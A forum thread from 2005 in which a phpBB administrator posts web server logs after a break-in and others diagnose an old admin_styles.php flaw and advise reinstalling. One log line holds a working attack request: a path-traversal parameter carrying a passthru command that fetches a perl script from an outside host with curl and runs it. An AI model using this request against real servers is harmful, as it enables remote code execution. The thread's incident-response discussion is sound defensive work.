phpBB Compromise

chris_yumm · 07-18-2005, 06:27 AM

phpBB2-2.0.8a-1mdk
apache2-2.0.48-6.8.100mdk
libphp_common432-4.3.4-4.5.100mdk

I woke up this morning and I noticed that my outgoing bandwidth was being used to the maximum. I did a "top" and 2 "perl" processes were running. I killed them and the "upload" stopped. I tried to see who was logged in to the system by doing a "ps aux" and other than me and the normal root and system accounts there was nobody else. I also stopped the httpd service and had a look at access_log and these seemed like interesting lines:

72.20.3.126 - - [18/Jul/2005:01:11:31 +0100] "GET /phpBB2/ HTTP/1.1" 200 13695 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:32 +0100] "GET /phpBB2/ HTTP/1.1" 200 13539 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:33 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=46c0db294946ee2e9ab089aa91cd34c2 HTTP/1.1" 200 13799 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:34 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=46c0db294946ee2e9ab089aa91cd34c2 HTTP/1.1" 200 11267 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:35 +0100] "GrqA1g--" 200 17732 "-" "-"
72.20.3.126 - - [18/Jul/2005:01:11:36 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=46c0db294946ee2e9ab089aa91cd34c2 HTTP/1.1" 200 9396 "http://my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:41 +0100] "GET /phpBB2/ HTTP/1.1" 200 14179 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:46 +0100] "GET /phpBB2/ HTTP/1.1" 200 14015 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:51 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=189b991fba1c2b8730fa0afa0dc7f97c HTTP/1.1" 200 13800 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:55 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=189b991fba1c2b8730fa0afa0dc7f97c HTTP/1.1" 200 9101 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:55 +0100] "GrqA1g--" 200 17732 "-" "-"
69.93.68.34 - - [18/Jul/2005:01:33:01 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=189b991fba1c2b8730fa0afa0dc7f97c HTTP/1.1" 200 9396 "http://my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:17 +0100] "GET /phpBB2/ HTTP/1.1" 200 14179 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:21 +0100] "GET /phpBB2/ HTTP/1.1" 200 14015 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:22 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=c88b1b172db1fdbc20bd7d8529b057e2 HTTP/1.1" 200 13800 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:23 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=c88b1b172db1fdbc20bd7d8529b057e2 HTTP/1.1" 200 9101 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:23 +0100] "GrqA1g--" 200 17732 "-" "-"
69.93.68.34 - - [18/Jul/2005:01:36:24 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=c88b1b172db1fdbc20bd7d8529b057e2 HTTP/1.1" 200 9396 "http://www.my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:08 +0100] "GET /phpBB2/ HTTP/1.1" 200 14179 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:09 +0100] "GET /phpBB2/ HTTP/1.1" 200 14015 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:09 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=d80dd8c38162b8aeed90579c5b2f33af HTTP/1.1" 200 13800 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:10 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=d80dd8c38162b8aeed90579c5b2f33af HTTP/1.1" 200 9101 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:10 +0100] "GrqA1g--" 200 17732 "-" "-"
69.93.68.34 - - [18/Jul/2005:01:37:11 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=d80dd8c38162b8aeed90579c5b2f33af HTTP/1.1" 200 9396 "http://www.my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:51 +0100] "GET /phpBB2/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=46c0db294946ee2e9ab089aa91cd34c2&niggaip=1&niggaport=1&nigga=passthru(%22cd%20/tmp;curl%20-C%20-%20http://pandor4.gratishost.com/lollol.txt%20%3E%20a.pl;perl%20a.pl%22); HTTP/1.1" 200 7938 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Am I just looking at attempts or have I been had? The style of my phpBB2 board has been changed to the default one also. What can I do to see what damage has been done? I changed most of the linux passwords this morning and left httpd off for now.

Capt_Caveman · 07-18-2005, 01:54 PM

That doesn't look like it exploits this vulnerability. In fact it's likely the older "admin_styles" vuln. It is interesting that you see 4 identical sets of attacks from 2 separate IPs in close proximity, but that may not mean anything and the code itself doesn't look like it's a self-propagating worm. It just looks like the same script run several times.

As far as what happened, you can see the SQL injection attack that uses "admin_db_utilities" to drop the table holding your site data and the final URL that uses the "admin_styles.php?" vuln to upload and execute a perl script. Check the upload directory (/tmp) for a file named a.pl .

You've been running a seriously outdated version of phpBB that has several significant vulnerabilities in it and have been compromised at least once. Simply upgrading phpBB to a current version and removing any files related to the compromise may not be enough. You should really format the system and re-install from trusted media. In the future, make sure to keep up with security updates and patches, as it will save you a lot of headaches.

Capt_Caveman · 07-18-2005, 01:57 PM

//Moderator note: I'm moving this to its own thread as it isn't directly related to the original vulnerability discussion.

chris_yumm · 07-19-2005, 01:39 AM

Darn, I had relied on the automatic vendor updates but I will not be doing that from now on. I had a look at the /tmp folder last night before formating and reinstalling and there was no .pl file. It must have been removed. Anyway, it was a learning experience. thank you!

Brian Knoblauch · 07-19-2005, 10:51 AM

Any decent options to replace phpbb? I'm interested in using it, but the security issues with phpbb have made me NOT do it so far. Wondering if there's something better out there?

Capt_Caveman · 07-19-2005, 11:34 AM

Quote:

Originally posted by chris_yumm
Darn, I had relied on the automatic vendor updates but I will not be doing that from now on.

What version of Mandrake were you running?

I had a look at the /tmp folder last night before formating and reinstalling and there was no .pl file. It must have been removed.
That's definitely troublesome as it suggests there was more activity that did not appear in the logs. Reinstalling is definitely the right move.

Anyway, it was a learning experience. thank you!
No problem. Btw, welcome to linuxquestions.

tkedwards · 07-22-2005, 12:54 AM

Quote:

Darn, I had relied on the automatic vendor updates but I will not be doing that from now on

PhpBB is a contrib package, ie. it was packaged by somebody outside of Mandrake. Mandrake doesn't provide updates for contrib packages between distro releases and never has.

However there are about 3500 packages in main in the latest Mandrake distro all of which they provide updates for. Your Mandrake installation
will still mostly consist of those so you should keep up with automatic updates otherwise you'll probably get into even more trouble.